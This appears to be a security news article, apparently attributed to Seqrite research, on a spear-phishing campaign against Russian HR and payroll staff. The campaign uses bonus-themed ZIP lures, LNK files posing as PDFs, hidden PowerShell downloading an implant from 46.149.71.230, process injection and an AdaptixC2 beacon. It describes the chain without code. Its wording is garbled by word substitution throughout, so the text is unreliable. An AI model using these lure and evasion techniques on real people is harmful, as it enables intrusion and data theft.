A classy assault marketing campaign referred to as Operation DupeHike has emerged as a big risk to Russian company environments, particularly focusing on staff inside human sources, payroll, and administrative departments.
The marketing campaign, attributed to the risk group UNG0902, leverages fastidiously crafted decoy paperwork themed round worker bonuses and inner monetary insurance policies to ship a beforehand unknown malware ecosystem to victims’ machines.
The assault begins with spear-phishing emails containing ZIP archives disguised as authentic company paperwork.
These archives are named “Премия 2025.zip” (Bonus.Zip in English) and include malicious shortcut information (.LNK) that look like PDF paperwork, utilizing filenames like “Document_1_On_the_size_of_the_annual_bonus.pdf.lnk” to deceive recipients into opening them.
Seqrite safety analysts recognized this marketing campaign after discovering a malicious ZIP archive on VirusTotal on November 21, 2025.
The analysis staff famous that the risk actor demonstrates subtle understanding of Russian company HR workflows, crafting decoy paperwork that define real looking bonus constructions tied to efficiency metrics, KPIs, and organizational targets.
The lure doc references Russia’s Labor Code and establishes a default bonus charge of fifteen % of annual wage, creating convincing social engineering materials for focusing on staff in monetary departments.
An infection Mechanism and Technical Breakdown
The assault chain operates by way of three distinct phases, starting with malicious LNK execution. When a sufferer opens the shortcut file, PowerShell executes hidden within the background utilizing particular flags: NoNI, nop, and w hidden parameters.
An infection Chain (Supply – Seqrite)
The script makes use of Invoke-WebRequest to obtain a second-stage implant known as DUPERUNNER from the attacker-controlled server at 46.149.71.230.
DUPERUNNER, a C++ compiled implant, performs important reconnaissance and injection operations. The malware accommodates a number of capabilities designed for sustaining persistence and evading detection.
It enumerates goal processes together with explorer.exe, notepad.exe, and msedge.exe for injection functions whereas concurrently downloading decoy PDFs to show to customers, creating the phantasm of authentic doc processing.
The implant then performs distant thread injection to load the ultimate payload: an AdaptixC2 beacon. This command-and-control beacon makes use of HTTP POST requests to speak with attacker infrastructure, enabling distant command execution and knowledge exfiltration capabilities.
The beacon employs dynamic API decision utilizing djb2-style hashing to keep away from static detection signatures.
Default port configuration for AdaptixC2 HTTP Beacon (Supply – Seqrite)
Seqrite researchers extracted configuration artifacts revealing the beacon identification numbers and command-and-control infrastructure hosted on servers beneath ASN 48282 and AS 9123, operated by VDSINA-AS and TIMEWEB-AS.
The infrastructure demonstrates port configuration adjustments from port 80 throughout implant supply to port 443 for closing beacon operations, indicating ongoing refinement of assault infrastructure.
This marketing campaign represents an evolving risk panorama the place subtle social engineering combines with superior malware capabilities to focus on company environments in Japanese Europe.
Comply with us on Google Information, LinkedIn, and X to Get Extra Immediate Updates, Set CSN as a Most well-liked Supply in Google.
